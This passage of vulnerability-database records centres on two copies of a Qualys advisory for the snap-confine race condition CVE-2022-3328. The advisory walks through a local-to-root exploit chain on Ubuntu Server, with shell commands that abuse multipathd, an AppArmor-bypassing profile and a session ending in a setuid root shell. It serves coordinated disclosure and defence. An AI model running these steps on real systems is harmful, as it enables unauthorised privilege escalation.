"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T17:50:12", "description": "Updates of ['polkit', 'util-linux', 'rust'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-01-27T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-4.0-0147", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-4034", "CVE-2022-21658", "CVE-2023-34060"], "modified": "2022-01-27T00:00:00", "id": "PHSA-2022-4.0-0147", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-147", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-12-09T15:12:51", "description": "", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-09T00:00:00", "type": "packetstorm", "title": "snap-confine must_mkdir_and_open_with_perms() Race Condition", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-44731", "CVE-2022-3328", "CVE-2022-41973", "CVE-2022-41974"], "modified": "2022-12-09T00:00:00", "id": "PACKETSTORM:170176", "href": "https://packetstormsecurity.com/files/170176/snap-confine-must_mkdir_and_open_with_perms-Race-Condition.html", "sourceData": "` \nQualys Security Advisory \n \nRace condition in snap-confine's must_mkdir_and_open_with_perms() \n(CVE-2022-3328) \n \n \n======================================================================== \nContents \n======================================================================== \n \nSummary \nBackground \nExploitation \nAcknowledgments \nTimeline \n \nI can't help but feel a missed opportunity to integrate lyrics from \none of the best songs ever: [SNAP! - The Power (Official Video)] \n-- https://twitter.com/spendergrsec/status/1494420041076461570 \n \n \n======================================================================== \nSummary \n======================================================================== \n \nWe discovered a race condition (CVE-2022-3328) in snap-confine, a \nSUID-root program installed by default on Ubuntu. 
In this advisory, we \ntell the story of this vulnerability (which was introduced in February \n2022 by the patch for CVE-2021-44731) and detail how we exploited it in \nUbuntu Server (a local privilege escalation, from any user to root) by \ncombining it with two vulnerabilities in multipathd (an authorization \nbypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973): \n \nhttps://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt \n \n \n======================================================================== \nBackground \n======================================================================== \n \nLike the crack of the whip, I Snap! attack \nRadical mind, day and night all the time \n-- SNAP! - The Power \n \nIn February 2022, we published CVE-2021-44731 in our \"Lemmings\" advisory \n(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt): \nto set up a snap's sandbox, snap-confine created the temporary directory \n/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did \nnot belong to root; a local attacker could race against snap-confine, \nretain control over /tmp/snap.$SNAP_NAME, and eventually obtain full \nroot privileges. \n \nThis vulnerability was patched by commit acb2b4c (\"cmd/snap-confine: \nPrevent user-controlled race in setup_private_mount\"), which introduced \na new helper function, must_mkdir_and_open_with_perms(): \n \n------------------------------------------------------------------------ \n142 static void setup_private_mount(const char *snap_name) \n... \n169 sc_must_snprintf(base_dir, sizeof(base_dir), \"/tmp/snap.%s\", snap_name); \n... \n176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700); \n------------------------------------------------------------------------ \n55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid, \n56 mode_t mode) \n.. \n61 mkdir: \n.. \n67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) { \n.. 
\n70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW); \n.. \n81 if (fstat(fd, &st) < 0) { \n.. \n84 if (st.st_uid != uid || st.st_gid != gid \n85 || st.st_mode != (S_IFDIR | mode)) { \n... \n130 if (rename(dir, random_dir) < 0) { \n... \n135 goto mkdir; \n------------------------------------------------------------------------ \n \n- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if \nit does not exist already; \n \n- if it already exists, and if it does not belong to root (at line 84), \nthen it is moved out of the way (at line 130) by rename()ing it to a \nrandom directory in /tmp, and its creation is retried (at line 135). \n \nWhen we reviewed this patch back in December 2021, we felt very nervous \nabout this rename() call (because it allows a local attacker to rename() \na directory they do not own), and we advised the Ubuntu Security Team to \neither not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create \nit in a non-world-writable directory instead of /tmp, or at least to use \nrenameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of \nthese ideas were deemed impractical (for example, renameat2() is not \nsupported by older kernel and glibc versions); moreover, we (Qualys) \nfailed to come up with a feasible attack plan against this rename() \ncall, so the patch was kept in its current form. \n \nAfter the release of Ubuntu 22.04 in April 2022, we decided to revisit \nsnap-confine and its recent hardening changes, and we finally found a \nway to exploit the rename() call in must_mkdir_and_open_with_perms(). \n \n \n======================================================================== \nExploitation \n======================================================================== \n \nIt's getting, it's getting, it's getting kinda heavy \nIt's getting, it's getting, it's getting kinda hectic \n-- SNAP! 
- The Power \n \nThe three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are: \n \n1/ snap-confine operates in /tmp to create a snap's temporary directory \n(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in \n/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in \nsc_bootstrap_mount_namespace(), where all of the Xs are randomized by \nmkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap \ninstance name by sc_instance_name_validate() (when all of the Xs are \nlowercase alphanumeric): \n \n------------------------------------------------------------------------ \n286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config) \n... \n288 char scratch_dir[] = \"/tmp/snap.rootfs_XXXXXX\"; \n... \n291 if (mkdtemp(scratch_dir) == NULL) { \n... \n303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL); \n... \n319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND, \n... \n331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL; \n... \n342 sc_must_snprintf(dst, sizeof dst, \"%s/%s\", scratch_dir, \n343 mnt->path); \n... 
\n352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND, \n------------------------------------------------------------------------ \n \n2/ We therefore execute two instances of snap-confine in parallel: \n \n- we block the first snap-confine immediately after it creates its root \ndirectory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this \nrace condition by \"single-stepping\" snap-confine, as explained in our \n\"Lemmings\" advisory); \n \n- we execute the second snap-confine with a snap instance name of \nrootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of \nthis second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX \nof the first snap-confine; \n \n- we kill this second snap-confine immediately after it rename()s its \ntemporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory \n/tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we \nreliably win this race condition with inotify, as explained in our \n\"Lemmings\" advisory); \n \n- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and \nresume the execution of the first snap-confine, whose root directory \nnow belongs to us. \n \n3/ We can therefore create an arbitrary symlink \n/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will \nbind-mount the real /tmp directory (which is world-writable) onto any \ndirectory in the filesystem (because mount() will follow our arbitrary \nsymlink at line 352). \n \nThis ability will eventually allow us to obtain full root privileges, \nbut we must first solve three problems: \n \n------------------------------------------------------------------------ \nProblem a/ We cannot trick snap-confine into rename()ing \n/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and \nmust_mkdir_and_open_with_perms() rename()s it only if it does not belong \nto root! 
\n \nThis problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX \nbelongs to the user root, but it belongs to the group of our own user, \nso must_mkdir_and_open_with_perms() rename()s it because it does not \nbelong to the group root (at line 84). \n \n------------------------------------------------------------------------ \nProblem b/ We cannot trick snap-confine into following our symlink \n/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace() \nbind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line \n319): if we create our symlink before this bind-mount, then it becomes \ncovered by the squashfs; and we cannot create our symlink after this \nbind-mount, because the squashfs is read-only and belongs to root! \n \nThe \"Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount\" \nof our \"Lemmings\" advisory suggests a solution to this problem: we must \nunmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace() \nbind-mounts it (at lines 303 and 319). The \"(deleted)\" technique we used \nin \"Lemmings\" (CVE-2021-3996 in util-linux) was patched in January 2022, \nbut we found a surprisingly simple workaround: \n \nwe mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately \nafter we re-create this directory ourselves; this allows us to unmount \n(with fusermount -u -z) any subsequent bind-mounts (even if they belong \nto root), because fusermount does not check that our FUSE filesystem is \nindeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX. \n \n------------------------------------------------------------------------ \nProblem c/ We cannot trick snap-confine into bind-mounting the real /tmp \nonto an arbitrary directory in the filesystem (at line 352), because \nsuch a bind-mount is forbidden by snap-confine's AppArmor profile! 
\n \nTo solve this problem, we must bypass AppArmor completely, but the \ntechnique we used in our \"Lemmings\" advisory (we wrapped snap-confine's \nexecution in an AppArmor profile that was in \"complain\" mode, not in \n\"enforce\" mode) was patched in February 2022 (by commits 26eed65 and \n4a2eb78, \"ensure that snap-confine is in strict confinement\" and \n\"Tighten AppArmor label check\"): \n \nnow, snap-confine's execution must be wrapped in an AppArmor profile \nthat is in \"enforce\" mode and whose label matches the regular expression \n\"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$\". \n \nWe were about to give up on trying to exploit snap-confine, when we \ndiscovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is \ninstalled by default on Ubuntu Server): these two vulnerabilities allow \nus to create a directory named \"failed_wwids\" (user root, group root, \nmode 0700) anywhere in the filesystem, and we were able to transform \nthis very limited directory creation into a complete AppArmor bypass. \n \nAppArmor supports policy namespaces that are loosely related to kernel \nuser namespaces; by default, no AppArmor namespaces exist: \n \n------------------------------------------------------------------------ \n$ ls -la /sys/kernel/security/apparmor/policy/namespaces \ntotal 0 \ndrwxr-xr-x 2 root root 0 Aug 6 12:42 . \ndrwxr-xr-x 5 root root 0 Aug 6 12:42 .. \n------------------------------------------------------------------------ \n \nHowever, we (attackers) can create an AppArmor namespace \"failed_wwids\" \nby exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd: \n \n------------------------------------------------------------------------ \n$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath \n \n$ multipathd list devices | grep 'whitelisted, unmonitored' \nsda1 devnode whitelisted, unmonitored \n... 
\n \n$ multipathd list list path sda1 \nfail \n \n$ ls -la /sys/kernel/security/apparmor/policy/namespaces \ntotal 0 \ndrwxr-xr-x 3 root root 0 Aug 6 12:42 . \ndrwxr-xr-x 5 root root 0 Aug 6 12:42 .. \ndrwx------ 5 root root 0 Aug 6 13:38 failed_wwids \n------------------------------------------------------------------------ \n \nThen, we can enter this AppArmor namespace by creating and entering an \nunprivileged user namespace: \n \n------------------------------------------------------------------------ \n$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh \n------------------------------------------------------------------------ \n \nInside this namespace, we can create an AppArmor profile labeled \n\"/usr/lib/snapd/snap-confine\" that is in \"enforce\" mode and allows all \npossible operations: \n \n------------------------------------------------------------------------ \n# apparmor_parser -K -a << \"EOF\" \n/usr/lib/snapd/snap-confine (enforce) { \ncapability, \nnetwork, \nmount, \nremount, \numount, \npivot_root, \nptrace, \nsignal, \ndbus, \nunix, \nfile, \nchange_profile, \n} \nEOF \n------------------------------------------------------------------------ \n \nBack in the initial namespace, we check that our \"allow all\" AppArmor \nprofile still exists: \n \n------------------------------------------------------------------------ \n# aa-status \napparmor module is loaded. \n32 profiles are loaded. \n32 profiles are in enforce mode. \n... 
\n:failed_wwids:/usr/lib/snapd/snap-confine \n------------------------------------------------------------------------ \n \nLast, we make sure that snap-confine accepts our \"allow all\" AppArmor \nprofile (i.e., AppArmor is bypassed, and snap-confine is effectively \nunconfined): \n \n------------------------------------------------------------------------ \n$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent \n... \nDEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine \nDEBUG: apparmor mode is: enforce \n------------------------------------------------------------------------ \n \nWe can therefore bind-mount /tmp onto an arbitrary directory in the \nfilesystem (by exploiting CVE-2022-3328); since we already depend on \nmultipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath, \ncreate our own shared library /lib/multipath/libchecktur.so, shutdown \nmultipathd (by exploiting CVE-2022-41974), restart multipathd (through \nits Unix socket), and finally obtain full root privileges (because \nmultipathd executes our shared library as root when it restarts): \n \n------------------------------------------------------------------------ \n$ grep multipath /proc/self/mountinfo | wc \n0 0 0 \n \n$ gcc -o CVE-2022-3328 CVE-2022-3328.c \n$ ./CVE-2022-3328 \nscratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c \n \n$ grep multipath /proc/self/mountinfo \n1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw \n... \n \n$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c \n \n$ ps -ef | grep 'multipath[d]' \nroot 371 1 0 12:42 ? 
00:00:00 /sbin/multipathd -d -s \n \n$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit \nok \n \n$ ps -ef | grep 'multipath[d]' | wc \n0 0 0 \n \n$ ls -l /tmp/sh \nls: cannot access '/tmp/sh': No such file or directory \n \n$ multipathd list daemon \nerror -104 receiving packet \n \n$ ls -l /tmp/sh \n-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh \n \n$ /tmp/sh -p \n# id \nuid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup) \n^^^^^^^^^^^^ \n------------------------------------------------------------------------ \n \n \n======================================================================== \nAcknowledgments \n======================================================================== \n \nWe thank the Ubuntu security team (Alex Murray and Seth Arnold in \nparticular) and the snapd team for their hard work on this snap-confine \nvulnerability. We also thank the members of linux-distros@openwall. \n \n \n======================================================================== \nTimeline \n======================================================================== \n \n2022-08-23: Contacted security@ubuntu. \n \n2022-11-28: Contacted linux-distros@openwall. \n \n2022-11-30: Coordinated Release Date (17:00 UTC). \n \n`\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/170176/QSA-snap-confine.txt"}], "zdt": [{"lastseen": "2023-12-02T16:52:17", "description": "Qualys discovered a race condition (CVE-2022-3328) in snap-confine, a SUID-root program installed by default on Ubuntu. 
In this advisory, they tell the story of this vulnerability (which was introduced in February 2022 by the patch for CVE-2021-44731) and detail how they exploited it in Ubuntu Server (a local privilege escalation, from any user to root) by combining it with two vulnerabilities in multipathd (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973).", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-10T00:00:00", "type": "zdt", "title": "Ubuntu Server snap-confine must_mkdir_and_open_with_perms() Race Condition Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-44731", "CVE-2022-3328", "CVE-2022-41973", "CVE-2022-41974"], "modified": "2022-12-10T00:00:00", "id": "1337DAY-ID-38096", "href": "https://0day.today/exploit/description/38096", "sourceData": "Race condition in snap-confine's 
must_mkdir_and_open_with_perms()\n(CVE-2022-3328)\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nBackground\nExploitation\nAcknowledgments\nTimeline\n\n I can't help but feel a missed opportunity to integrate lyrics from\n one of the best songs ever: [SNAP! - The Power (Official Video)]\n -- https://twitter.com/spendergrsec/status/1494420041076461570\n\n\n========================================================================\nSummary\n========================================================================\n\nWe discovered a race condition (CVE-2022-3328) in snap-confine, a\nSUID-root program installed by default on Ubuntu. In this advisory, we\ntell the story of this vulnerability (which was introduced in February\n2022 by the patch for CVE-2021-44731) and detail how we exploited it in\nUbuntu Server (a local privilege escalation, from any user to root) by\ncombining it with two vulnerabilities in multipathd (an authorization\nbypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):\n\nhttps://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt\n\n\n========================================================================\nBackground\n========================================================================\n\n Like the crack of the whip, I Snap! attack\n Radical mind, day and night all the time\n -- SNAP! 
- The Power\n\nIn February 2022, we published CVE-2021-44731 in our \"Lemmings\" advisory\n(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):\nto set up a snap's sandbox, snap-confine created the temporary directory\n/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did\nnot belong to root; a local attacker could race against snap-confine,\nretain control over /tmp/snap.$SNAP_NAME, and eventually obtain full\nroot privileges.\n\nThis vulnerability was patched by commit acb2b4c (\"cmd/snap-confine:\nPrevent user-controlled race in setup_private_mount\"), which introduced\na new helper function, must_mkdir_and_open_with_perms():\n\n------------------------------------------------------------------------\n142 static void setup_private_mount(const char *snap_name)\n...\n169 sc_must_snprintf(base_dir, sizeof(base_dir), \"/tmp/snap.%s\", snap_name);\n...\n176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);\n------------------------------------------------------------------------\n 55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,\n 56 mode_t mode)\n ..\n 61 mkdir:\n ..\n 67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) {\n ..\n 70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);\n ..\n 81 if (fstat(fd, &st) < 0) {\n ..\n 84 if (st.st_uid != uid || st.st_gid != gid\n 85 || st.st_mode != (S_IFDIR | mode)) {\n...\n130 if (rename(dir, random_dir) < 0) {\n...\n135 goto mkdir;\n------------------------------------------------------------------------\n\n- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if\n it does not exist already;\n\n- if it already exists, and if it does not belong to root (at line 84),\n then it is moved out of the way (at line 130) by rename()ing it to a\n random directory in /tmp, and its creation is retried (at line 135).\n\nWhen we reviewed this patch back in December 2021, we felt very nervous\nabout this rename() call 
(because it allows a local attacker to rename()\na directory they do not own), and we advised the Ubuntu Security Team to\neither not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create\nit in a non-world-writable directory instead of /tmp, or at least to use\nrenameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of\nthese ideas were deemed impractical (for example, renameat2() is not\nsupported by older kernel and glibc versions); moreover, we (Qualys)\nfailed to come up with a feasible attack plan against this rename()\ncall, so the patch was kept in its current form.\n\nAfter the release of Ubuntu 22.04 in April 2022, we decided to revisit\nsnap-confine and its recent hardening changes, and we finally found a\nway to exploit the rename() call in must_mkdir_and_open_with_perms().\n\n\n========================================================================\nExploitation\n========================================================================\n\n It's getting, it's getting, it's getting kinda heavy\n It's getting, it's getting, it's getting kinda hectic\n -- SNAP! 
- The Power\n\nThe three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:\n\n1/ snap-confine operates in /tmp to create a snap's temporary directory\n(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in\n/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in\nsc_bootstrap_mount_namespace(), where all of the Xs are randomized by\nmkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap\ninstance name by sc_instance_name_validate() (when all of the Xs are\nlowercase alphanumeric):\n\n------------------------------------------------------------------------\n286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)\n...\n288 char scratch_dir[] = \"/tmp/snap.rootfs_XXXXXX\";\n...\n291 if (mkdtemp(scratch_dir) == NULL) {\n...\n303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);\n...\n319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,\n...\n331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;\n...\n342 sc_must_snprintf(dst, sizeof dst, \"%s/%s\", scratch_dir,\n343 mnt->path);\n...\n352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,\n------------------------------------------------------------------------\n\n2/ We therefore execute two instances of snap-confine in parallel:\n\n- we block the first snap-confine immediately after it creates its root\n directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this\n race condition by \"single-stepping\" snap-confine, as explained in our\n \"Lemmings\" advisory);\n\n- we execute the second snap-confine with a snap instance name of\n rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of\n this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX\n of the first snap-confine;\n\n- we kill this second snap-confine immediately after it rename()s its\n temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory\n /tmp/snap.rootfs_XXXXXX of the 
first snap-confine -- at line 130 (we\n reliably win this race condition with inotify, as explained in our\n \"Lemmings\" advisory);\n\n- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and\n resume the execution of the first snap-confine, whose root directory\n now belongs to us.\n\n3/ We can therefore create an arbitrary symlink\n/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will\nbind-mount the real /tmp directory (which is world-writable) onto any\ndirectory in the filesystem (because mount() will follow our arbitrary\nsymlink at line 352).\n\nThis ability will eventually allow us to obtain full root privileges,\nbut we must first solve three problems:\n\n------------------------------------------------------------------------\nProblem a/ We cannot trick snap-confine into rename()ing\n/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and\nmust_mkdir_and_open_with_perms() rename()s it only if it does not belong\nto root!\n\nThis problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX\nbelongs to the user root, but it belongs to the group of our own user,\nso must_mkdir_and_open_with_perms() rename()s it because it does not\nbelong to the group root (at line 84).\n\n------------------------------------------------------------------------\nProblem b/ We cannot trick snap-confine into following our symlink\n/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()\nbind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line\n319): if we create our symlink before this bind-mount, then it becomes\ncovered by the squashfs; and we cannot create our symlink after this\nbind-mount, because the squashfs is read-only and belongs to root!\n\nThe \"Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount\"\nof our \"Lemmings\" advisory suggests a solution to this problem: we must\nunmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()\nbind-mounts it (at lines 303 and 
319). The \"(deleted)\" technique we used\nin \"Lemmings\" (CVE-2021-3996 in util-linux) was patched in January 2022,\nbut we found a surprisingly simple workaround:\n\nwe mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately\nafter we re-create this directory ourselves; this allows us to unmount\n(with fusermount -u -z) any subsequent bind-mounts (even if they belong\nto root), because fusermount does not check that our FUSE filesystem is\nindeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.\n\n------------------------------------------------------------------------\nProblem c/ We cannot trick snap-confine into bind-mounting the real /tmp\nonto an arbitrary directory in the filesystem (at line 352), because\nsuch a bind-mount is forbidden by snap-confine's AppArmor profile!\n\nTo solve this problem, we must bypass AppArmor completely, but the\ntechnique we used in our \"Lemmings\" advisory (we wrapped snap-confine's\nexecution in an AppArmor profile that was in \"complain\" mode, not in\n\"enforce\" mode) was patched in February 2022 (by commits 26eed65 and\n4a2eb78, \"ensure that snap-confine is in strict confinement\" and\n\"Tighten AppArmor label check\"):\n\nnow, snap-confine's execution must be wrapped in an AppArmor profile\nthat is in \"enforce\" mode and whose label matches the regular expression\n\"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$\".\n\nWe were about to give up on trying to exploit snap-confine, when we\ndiscovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is\ninstalled by default on Ubuntu Server): these two vulnerabilities allow\nus to create a directory named \"failed_wwids\" (user root, group root,\nmode 0700) anywhere in the filesystem, and we were able to transform\nthis very limited directory creation into a complete AppArmor bypass.\n\nAppArmor supports policy namespaces that are loosely related to kernel\nuser namespaces; by default, no AppArmor namespaces 
exist:\n\n------------------------------------------------------------------------\n$ ls -la /sys/kernel/security/apparmor/policy/namespaces\ntotal 0\ndrwxr-xr-x 2 root root 0 Aug 6 12:42 .\ndrwxr-xr-x 5 root root 0 Aug 6 12:42 ..\n------------------------------------------------------------------------\n\nHowever, we (attackers) can create an AppArmor namespace \"failed_wwids\"\nby exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:\n\n------------------------------------------------------------------------\n$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath\n\n$ multipathd list devices | grep 'whitelisted, unmonitored'\n sda1 devnode whitelisted, unmonitored\n ...\n\n$ multipathd list list path sda1\nfail\n\n$ ls -la /sys/kernel/security/apparmor/policy/namespaces\ntotal 0\ndrwxr-xr-x 3 root root 0 Aug 6 12:42 .\ndrwxr-xr-x 5 root root 0 Aug 6 12:42 ..\ndrwx------ 5 root root 0 Aug 6 13:38 failed_wwids\n------------------------------------------------------------------------\n\nThen, we can enter this AppArmor namespace by creating and entering an\nunprivileged user namespace:\n\n------------------------------------------------------------------------\n$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh\n------------------------------------------------------------------------\n\nInside this namespace, we can create an AppArmor profile labeled\n\"/usr/lib/snapd/snap-confine\" that is in \"enforce\" mode and allows all\npossible operations:\n\n------------------------------------------------------------------------\n# apparmor_parser -K -a << \"EOF\"\n/usr/lib/snapd/snap-confine (enforce) {\ncapability,\nnetwork,\nmount,\nremount,\numount,\npivot_root,\nptrace,\nsignal,\ndbus,\nunix,\nfile,\nchange_profile,\n}\nEOF\n------------------------------------------------------------------------\n\nBack in the initial namespace, we check that our \"allow all\" AppArmor\nprofile still 
